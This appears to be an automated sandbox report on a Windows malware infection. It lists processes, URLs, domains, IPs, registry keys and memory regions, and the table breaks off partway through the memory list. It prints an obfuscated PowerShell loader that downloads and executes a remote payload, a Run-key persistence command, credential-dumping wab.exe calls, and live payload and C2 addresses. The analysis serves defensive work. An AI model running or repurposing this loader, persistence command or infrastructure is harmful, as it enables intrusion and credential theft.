Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom)
U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR
bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7
lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function
Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically;
$Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes)
($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn
s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf
MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre
V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera
';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1
Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi
';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt
Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT
ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr
egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid
silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske
andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke
Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes
'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t
KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri
');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv
W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes
(Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb
ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF
er ');Jettes (Circumflexes ' Hic$DefiSGoo k.orteTranpNulvtgummi,nfrcO,dy. skrHUn ieAa aa PerdSp,reBillrJordsB.am[Frug$FormOSuttpFidutLnsird
nkiGiggnBlansfeer4I da5Over]Korv=Reig$di,kS StuiUhelmInseuKnsklLeattu,spadur.nQuadsEmulc CykeSlavn H pe Regr fkosUdry ');$Isoln=Circumflexes
' .meS,ondkSka eSemipUndetSpgeiP,nccAver.Mer.DAnomoP stw.deanthrolov roFarta N,ddSt dFAssui Krel Bd,eUntr(Ove,$OmsoLScarePerevDyreeflyvmJi
buStorl Kkki PergWarnh ikleFuldd .dr,Gfor$.aktHEpisvPriniHarerSexuv PholBll e Pros ya)un.h ';$Isoln=$Forankringspunktets[1]+$Isoln;$Hvirvles=$Forankringspunktets[0];Jettes
(Circumflexes ' Sh $Eft gPounlFromoUfatb iea S,ilUnc,:CasuPFlanuStjdnVaskc B.otRighuU.tis Sor=hu,t(SculTCorreOutks Th,tReal-SyttP
avaRingt Tr hThru Modt$GlauH.elfvForkiTensrr.prvMowelLaise Pe.s eat) Tyn ');while (!$Punctus) {Jettes (Circumflexes 'Unpr$B.blgPolylPorto
Ba.bKampaAzidlPaal:MonomUdslaharorCanacBdeaeBr.nsSupecSubreSretn ThocTor.eDat,=Macr$.xtrtOverrBobbuNonseHnge ') ;Jettes $Isoln;Jettes
(Circumflexes ' MinSKu.ttPensaOverr ynetMatr-PromSMin lThimeCosteSkndpSkva npa4,esp ');Jettes (Circumflexes 'Ufor$ SilgKat.lLiquochokbBrnda
Trol kur:SnowPPostuAndenAnlgcAf.utSk.duAffesOver=Bram( afgT DrieRemisOwentFelt- UdfPBlomaD,fftRe,vhNd.i Frad$ ollH Tipv ProiHyd
rUp.av ForlBefoeProjsHjes)Sewm ') ;Jettes (Circumflexes 'Coin$ OrngWaftlB.reo veb Scoa AttlQuis:.axiVDekroAggrl Spol s.ae
ParyJingbResuaAlcolDamplVo,dsBlr,=Skub$ProtgRufflserooR.cibLe ea MenlAr,o: O.eMEmmeaTommgForriUdbrkK.sse,kkor.trinAksge aars.jem+Inst+
T l%Prom$BecrAVarsl UdtvShoreHvo,oLeavlTrieiCrybtAcceeTveds Jvn.LeptcMetaoRegou eren,amnt .is ') ;$Levemulighed=$Alveolites[$Volleyballs];}Jettes
(Circumflexes 'Anon$ LiggAsenlUnchoOph.bPalaa utilSubm:TndeHCyatoConcvNonoeDelidApoksBruntStemrHermuCou,kringtr thuRingrUheleSrstrBiocnSla.e,refsTil,
D.st=Matr Di,GAmate galtBesk-DissCNon.oCournPartt FoueUf.dnM,wstCamb Vi.r$VatiHkapevHydri LetrStatvA,allSpaaeCocos Hae ');Jettes
(Circumflexes 'Tenn$ JusgPorzl HolochacbUnp aB,vrl Uar:chawAPostbOpgrjModeuScordForgi.yrec andaOvert,tereHern Diss= sta Ciga[flagSHoveyAfghsJesut
Sube ConmTool. VrdCSingoForfn Myov,rlleOthir s.itUnva]Astr:Kont:BeviFsamorCarroPlanmliftBanh aTil,sC.rreDown6arbe4UnfrSA.altFestr
Veji Civn,tilg,onr(Fors$KnskH PeroPrebv.oule StadForusWrestPerirs.etuser k TaltEkstuDecarPumpeHyper Ne.n H,le Mims Uds)Br.c
');Jettes (Circumflexes ',eta$O elgEr,vl BenoskrmbmesoaMalllAlon:bifiLS.tivA.glhAstry ObetModetud.meSk,lr KlonEmboeSupe Ungd=Stil
prie[ChurS isey kovsInittEl ve HucmGram. In,TBazoeKonsxRu,gtSk,a. VogE,ekanhempc ,oso MatdStn,iDrifnSa mgAdmi] Pej: La : MasAInskSStriC
Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom)
U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR
bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7
lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ
/d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty
-Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
|
|
|
|
C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
|
"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
|
|
|
|
C:\Windows\SysWOW64\clip.exe
|
"C:\Windows\SysWOW64\clip.exe"
|
|
|
|
C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
|
"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 23 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
https://duelvalenza.it/FIPWKWOaFXJGe178.bin
|
46.254.34.12
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin
|
46.254.34.12
|
||
|
http://geoplugin.net/json.gpf
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://aka.ms/pscore6lBcq
|
unknown
|
||
|
http://crl.microD
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin
|
unknown
|
||
|
http://europrotectie.ro
|
unknown
|
||
|
https://europrotectie.ro/Methink1.thnXRwl
|
unknown
|
||
|
http://geoplugin.net/json.gp0B8
|
unknown
|
||
|
https://europrotectie.ro/Methink1.thn
|
188.212.111.134
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://duelvalenza.it/
|
unknown
|
||
|
https://duelvalenza.it/FIPWKWOaFXJGe178.binq(
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://87.121.108
|
unknown
|
||
|
https://europrotectie.ro
|
unknown
|
||
|
http://87.121.105.163/Detentionen.javaXRwl
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://geoplugin.net/json.gp)B
|
unknown
|
||
|
https://europrotectie.ro/Methink1.thnP
|
unknown
|
||
|
http://87.121.105.163/PUzAKuQ35.bin
|
87.121.105.163
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.387mfyr.sbs/abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==
|
137.220.252.40
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://87.121.105.163/Detentionen.javaXRwl4
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://www.imvu.comata
|
unknown
|
||
|
http://crl.mM5
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
http://87.121.105.163/Detentionen.java
|
87.121.105.163
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 38 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
45.88.90.110
|
|
|
|
www.duelvalenza.it
|
unknown
|
|
|
|
www.led-svitidla.eu
|
unknown
|
|
|
|
www.387mfyr.sbs
|
137.220.252.40
|
||
|
led-svitidla.eu
|
37.235.104.9
|
||
|
europrotectie.ro
|
188.212.111.134
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
duelvalenza.it
|
46.254.34.12
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.88.90.110
|
jgbours284hawara01.duckdns.org
|
Bulgaria
|
|
|
|
188.212.111.134
|
europrotectie.ro
|
Romania
|
||
|
137.220.252.40
|
www.387mfyr.sbs
|
Singapore
|
||
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
46.254.34.12
|
duelvalenza.it
|
Italy
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Vibeka
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
bynkefugls
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
DJNLOJ3PER
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Quicker
|
Savvy
|
||
|
HKEY_CURRENT_USER\Environment
|
Pneumatorrhachis
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
time
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Clouters
|
Slapperne
|
||
|
HKEY_CURRENT_USER\Environment
|
Deciduate
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 38 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
23690000
|
unclassified section
|
page execute and read and write
|
|
|
|
2E00000
|
system
|
page execute and read and write
|
|
|
|
5DFF000
|
trusted library allocation
|
page read and write
|
|
|
|
8980000
|
direct allocation
|
page execute and read and write
|
|
|
|
A67A000
|
direct allocation
|
page execute and read and write
|
|
|
|
44E0000
|
unkown
|
page execute and read and write
|
|
|
|
8830000
|
direct allocation
|
page execute and read and write
|
|
|
|
D40000
|
trusted library allocation
|
page read and write
|
|
|
|
902B000
|
direct allocation
|
page execute and read and write
|
|
|
|
5A41000
|
trusted library allocation
|
page read and write
|
|
|
|
D00000
|
trusted library allocation
|
page read and write
|
|
|
|
460000
|
system
|
page execute and read and write
|
|
|
|
F40000
|
system
|
page execute and read and write
|
|
|
|
5A14000
|
trusted library allocation
|
page read and write
|
|
|
|
647C000
|
heap
|
page read and write
|
|
|
|
214A36AE000
|
trusted library allocation
|
page read and write
|
|
|
|
647C000
|
heap
|
page read and write
|
|
|
|
C01000
|
heap
|
page read and write
|
||
|
1ACAF930000
|
heap
|
page read and write
|
||
|
1A47E66E000
|
heap
|
page read and write
|
||
|
225A1000
|
heap
|
page read and write
|
||
|
967000
|
heap
|
page read and write
|
||
|
1A47E5D3000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4B51000
|
trusted library allocation
|
page read and write
|
||
|
2908000
|
heap
|
page read and write
|
||
|
E98000
|
heap
|
page read and write
|
||
|
1A47E8A5000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
4839000
|
trusted library allocation
|
page read and write
|
||
|
5FBE000
|
stack
|
page read and write
|
||
|
22211000
|
direct allocation
|
page execute and read and write
|
||
|
22849000
|
heap
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
221FE000
|
stack
|
page read and write
|
||
|
8A4000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
5B51000
|
trusted library allocation
|
page read and write
|
||
|
2149584A000
|
trusted library allocation
|
page read and write
|
||
|
E3E000
|
stack
|
page read and write
|
||
|
7234000
|
heap
|
page read and write
|
||
|
64AF000
|
heap
|
page read and write
|
||
|
37B0000
|
heap
|
page read and write
|
||
|
4EB7000
|
trusted library allocation
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
6756000
|
heap
|
page read and write
|
||
|
73CC000
|
heap
|
page read and write
|
||
|
2A839CE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
219609E0000
|
heap
|
page read and write
|
||
|
2149583E000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
82B7000
|
trusted library allocation
|
page read and write
|
||
|
5460000
|
trusted library allocation
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
F5223FB000
|
stack
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
2227E000
|
stack
|
page read and write
|
||
|
5B79000
|
trusted library allocation
|
page read and write
|
||
|
707C000
|
stack
|
page read and write
|
||
|
13D1000
|
unkown
|
page readonly
|
||
|
F4A000
|
stack
|
page read and write
|
||
|
3547000
|
heap
|
page read and write
|
||
|
774E000
|
stack
|
page read and write
|
||
|
5F40000
|
heap
|
page read and write
|
||
|
F6A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A828FE000
|
stack
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
2DCF000
|
stack
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
1360000
|
unkown
|
page read and write
|
||
|
21C3E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3498000
|
heap
|
page read and write
|
||
|
47D1000
|
direct allocation
|
page execute and read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
A8E000
|
stack
|
page read and write
|
||
|
25379EEB000
|
heap
|
page read and write
|
||
|
6F30000
|
direct allocation
|
page read and write
|
||
|
AC8000
|
heap
|
page read and write
|
||
|
1ACAF990000
|
heap
|
page read and write
|
||
|
4BD8000
|
heap
|
page read and write
|
||
|
220DE000
|
direct allocation
|
page execute and read and write
|
||
|
3055000
|
heap
|
page read and write
|
||
|
2149411F000
|
trusted library allocation
|
page read and write
|
||
|
4E5E000
|
stack
|
page read and write
|
||
|
2A83ACA000
|
stack
|
page read and write
|
||
|
214ABAD0000
|
heap
|
page execute and read and write
|
||
|
2E96000
|
stack
|
page read and write
|
||
|
F523BFE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2537BA11000
|
trusted library allocation
|
page read and write
|
||
|
323A000
|
stack
|
page read and write
|
||
|
77B7000
|
trusted library allocation
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
84D5000
|
trusted library allocation
|
page read and write
|
||
|
5A06000
|
trusted library allocation
|
page read and write
|
||
|
5127000
|
trusted library allocation
|
page read and write
|
||
|
89C0000
|
direct allocation
|
page read and write
|
||
|
8545000
|
heap
|
page read and write
|
||
|
4FC2000
|
